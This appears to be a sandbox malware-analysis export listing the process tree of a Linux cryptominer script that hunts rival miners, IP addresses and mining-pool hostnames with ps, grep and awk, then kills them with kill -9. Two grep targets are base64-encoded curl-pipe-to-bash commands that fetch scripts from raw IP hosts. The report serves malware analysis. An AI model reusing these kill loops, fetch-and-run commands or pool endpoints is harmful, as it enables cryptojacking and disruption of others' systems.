/usr/bin/awkawk "{print \$2}"2⤵PID:1188
-
-
/bin/grepgrep -v grep2⤵PID:1186
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1189
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1185
-
-
/bin/grepgrep watchd0g2⤵PID:1187
-
-
/bin/grepgrep -v grep2⤵PID:1192
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1191
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1195
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1194
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1200
-
-
/bin/grepgrep 158.69.133.18:82202⤵PID:1199
-
-
/bin/grepgrep -v grep2⤵PID:1198
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1201
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1197
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1207
-
-
/bin/grepgrep /tmp/java2⤵PID:1206
-
-
/bin/grepgrep -v grep2⤵PID:1205
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1204
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1208
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1215
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1214
-
-
/bin/grepgrep gitee.com2⤵PID:1213
-
-
/bin/grepgrep -v grep2⤵PID:1212
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1211
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1220
-
-
/bin/grepgrep /tmp/java2⤵PID:1219
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1221
-
-
/bin/grepgrep -v grep2⤵PID:1218
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1217
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1227
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1226
-
-
/bin/grepgrep 104.248.4.1622⤵PID:1225
-
-
/bin/grepgrep -v grep2⤵PID:1224
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1223
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1233
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1234
-
-
/bin/grepgrep 89.35.39.782⤵PID:1232
-
-
/bin/grepgrep -v grep2⤵PID:1231
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1230
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1240
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1241
-
-
/bin/grepgrep -v grep2⤵PID:1238
-
-
/bin/psps aux2⤵PID:1237
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:1239
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1246
-
-
/bin/grepgrep kthrotlds2⤵PID:1245
-
-
/bin/grepgrep -v grep2⤵PID:1244
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1247
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1243
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1252
-
-
/bin/grepgrep ksoftirqds2⤵PID:1251
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1253
-
-
/bin/grepgrep -v grep2⤵PID:1250
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1249
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1259
-
-
/bin/grepgrep netdns2⤵PID:1258
-
-
/bin/grepgrep -v grep2⤵PID:1257
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1256
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1260
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1265
-
-
/bin/grepgrep watchdogs2⤵PID:1264
-
-
/bin/grepgrep -v grep2⤵PID:1263
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1262
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1266
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1271
-
-
/bin/grepgrep kdevtmpfsi2⤵PID:1270
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1272
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1268
-
-
/bin/grepgrep -v grep2⤵PID:1269
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1278
-
-
/bin/grepgrep -v grep2⤵PID:1276
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1279
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1275
-
-
/bin/grepgrep kinsing2⤵PID:1277
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1285
-
-
/bin/grepgrep redis22⤵PID:1284
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1286
-
-
/bin/grepgrep -v grep2⤵PID:1283
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1282
-
-
/bin/grepgrep " ps"2⤵PID:1291
-
-
/bin/grepgrep -v aux2⤵PID:1290
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1294
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1288
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1292
-
-
/bin/grepgrep -v grep2⤵PID:1289
-
-
/bin/grepgrep sync_supers2⤵PID:1298
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1296
-
-
/bin/grepgrep -v grep2⤵PID:1297
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1300
-
-
/usr/bin/cutcut -c 9-152⤵PID:1299
-
-
/usr/bin/cutcut -c 9-152⤵PID:1305
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1306
-
-
/bin/grepgrep -v grep2⤵PID:1303
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1302
-
-
/bin/grepgrep cpuset2⤵PID:1304
-
-
/bin/grepgrep "x]"2⤵PID:1310
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1311
-
-
/bin/grepgrep -v grep2⤵PID:1308
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1312
-
-
/bin/grepgrep -v aux2⤵PID:1309
-
-
/bin/psps aux2⤵PID:1307
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1318
-
-
/bin/grepgrep -v grep2⤵PID:1314
-
-
/bin/grepgrep -v aux2⤵PID:1315
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1313
-
-
/bin/grepgrep "sh] <"2⤵PID:1316
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1317
-
-
/bin/grepgrep -v grep2⤵PID:1320
-
-
/bin/grepgrep -v aux2⤵PID:1321
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1324
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1323
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1319
-
-
/bin/grepgrep " \\[]"2⤵PID:1322
-
-
/bin/grepgrep -v grep2⤵PID:1326
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1325
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1328
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1329
-
-
/bin/grepgrep /tmp/l.sh2⤵PID:1327
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1333
-
-
/bin/grepgrep /tmp/zmcat2⤵PID:1332
-
-
/bin/grepgrep -v grep2⤵PID:1331
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1330
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1334
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1339
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1338
-
-
/bin/grepgrep hahwNEdB2⤵PID:1337
-
-
/bin/grepgrep -v grep2⤵PID:1336
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1335
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1343
-
-
/bin/grepgrep CnzFVPLF2⤵PID:1342
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1344
-
-
/bin/grepgrep -v grep2⤵PID:1341
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1340
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1349
-
-
/bin/grepgrep -v grep2⤵PID:1346
-
-
/bin/psps aux2⤵PID:1345
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1348
-
-
/bin/grepgrep CvKzzZLs2⤵PID:1347
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1353
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:1352
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1354
-
-
/bin/grepgrep -v grep2⤵PID:1351
-
-
/bin/psps aux2⤵PID:1350
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1358
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1359
-
-
/bin/grepgrep /tmp/udevd2⤵PID:1357
-
-
/bin/grepgrep -v grep2⤵PID:1356
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1355
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1363
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1364
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:1362
-
-
/bin/grepgrep -v grep2⤵PID:1361
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1360
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1369
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:1367
-
-
/bin/grepgrep -v grep2⤵PID:1366
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1365
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1368
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1373
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1374
-
-
/bin/grepgrep sustse2⤵PID:1372
-
-
/bin/grepgrep -v grep2⤵PID:1371
-
-
/bin/psps aux2⤵PID:1370
-
-
/bin/grepgrep sustse32⤵PID:1377
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1378
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1379
-
-
/bin/grepgrep -v grep2⤵PID:1376
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1375
-
-
/bin/grepgrep wget2⤵PID:1383
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1384
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1385
-
-
/bin/grepgrep -v grep2⤵PID:1381
-
-
/bin/psps aux2⤵PID:1380
-
-
/bin/grepgrep mr.sh2⤵PID:1382
-
-
/bin/grepgrep curl2⤵PID:1389
-
-
/bin/grepgrep mr.sh2⤵PID:1388
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1390
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1391
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1386
-
-
/bin/grepgrep -v grep2⤵PID:1387
-
-
/bin/grepgrep 2mr.sh2⤵PID:1394
-
-
/bin/grepgrep -v grep2⤵PID:1393
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1396
-
-
/bin/grepgrep wget2⤵PID:1395
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1397
-
-
/bin/psps aux2⤵PID:1392
-
-
/bin/grepgrep 2mr.sh2⤵PID:1400
-
-
/bin/grepgrep curl2⤵PID:1401
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1402
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1403
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1398
-
-
/bin/grepgrep -v grep2⤵PID:1399
-
-
/bin/grepgrep wget2⤵PID:1407
-
-
/bin/grepgrep cr5.sh2⤵PID:1406
-
-
/bin/grepgrep -v grep2⤵PID:1405
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1408
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1409
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1404
-
-
/bin/grepgrep curl2⤵PID:1413
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1414
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1415
-
-
/bin/grepgrep -v grep2⤵PID:1411
-
-
/bin/grepgrep cr5.sh2⤵PID:1412
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1410
-
-
/bin/grepgrep -v grep2⤵PID:1417
-
-
/bin/grepgrep wget2⤵PID:1419
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1416
-
-
/bin/grepgrep logo9.jpg2⤵PID:1418
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1421
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1420
-
-
/bin/grepgrep logo9.jpg2⤵PID:1424
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1426
-
-
/bin/grepgrep -v grep2⤵PID:1423
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1422
-
-
/bin/grepgrep curl2⤵PID:1425
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1427
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1428
-
-
/bin/grepgrep -v grep2⤵PID:1429
-
-
/bin/grepgrep j2.conf2⤵PID:1430
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1432
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1431
-
-
/bin/grepgrep wget2⤵PID:1436
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1437
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1438
-
-
/bin/grepgrep -v grep2⤵PID:1434
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1433
-
-
/bin/grepgrep luk-cpu2⤵PID:1435
-
-
/bin/grepgrep luk-cpu2⤵PID:1441
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1439
-
-
/bin/grepgrep curl2⤵PID:1442
-
-
/bin/grepgrep -v grep2⤵PID:1440
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1443
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1444
-
-
/bin/grepgrep wget2⤵PID:1448
-
-
/bin/grepgrep -v grep2⤵PID:1446
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1449
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1450
-
-
/bin/grepgrep ficov2⤵PID:1447
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1445
-
-
/bin/grepgrep curl2⤵PID:1454
-
-
/bin/grepgrep ficov2⤵PID:1453
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1455
-
-
/bin/grepgrep -v grep2⤵PID:1452
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1456
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1451
-
-
/bin/grepgrep wget2⤵PID:1460
-
-
/bin/grepgrep he.sh2⤵PID:1459
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1461
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1462
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1457
-
-
/bin/grepgrep -v grep2⤵PID:1458
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1463
-
-
/bin/grepgrep -v grep2⤵PID:1464
-
-
/bin/grepgrep he.sh2⤵PID:1465
-
-
/bin/grepgrep curl2⤵PID:1466
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1468
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1467
-
-
/bin/grepgrep wget2⤵PID:1472
-
-
/bin/grepgrep miner.sh2⤵PID:1471
-
-
/bin/grepgrep -v grep2⤵PID:1470
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1474
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1473
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1469
-
-
/bin/grepgrep curl2⤵PID:1478
-
-
/bin/grepgrep miner.sh2⤵PID:1477
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1480
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1476
-
-
/bin/grepgrep wget2⤵PID:1484
-
-
/bin/grepgrep nullcrew2⤵PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1482
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1485
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1486
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1481
-
-
/bin/grepgrep nullcrew2⤵PID:1489
-
-
/bin/grepgrep -v grep2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1487
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1491
-
-
/bin/grepgrep curl2⤵PID:1490
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1496
-
-
/bin/grepgrep 107.174.47.1562⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1501
-
-
/bin/grepgrep 83.220.169.2472⤵PID:1500
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1502
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1506
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1503
-
-
/bin/grepgrep 51.38.203.1462⤵PID:1505
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1511
-
-
/bin/grepgrep 144.217.45.452⤵PID:1510
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1512
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1508
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1516
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1517
-
-
/bin/grepgrep 107.174.47.1812⤵PID:1515
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1513
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1521
-
-
/bin/grepgrep 176.31.6.162⤵PID:1520
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1522
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1526
-
-
/bin/grepgrep -v grep2⤵PID:1524
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1527
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1523
-
-
/bin/grepgrep mine.moneropool.com2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1532
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1531
-
-
/bin/grepgrep pool.t00ls.ru2⤵PID:1530
-
-
/bin/grepgrep -v grep2⤵PID:1529
-
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:1528
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵PID:1535
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1536
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:1533
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1537
-
-
/bin/grepgrep -v grep2⤵PID:1534
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1541
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1542
-
-
/bin/grepgrep -v grep2⤵PID:1539
-
-
/bin/psps auxf2⤵PID:1538
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵PID:1540
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686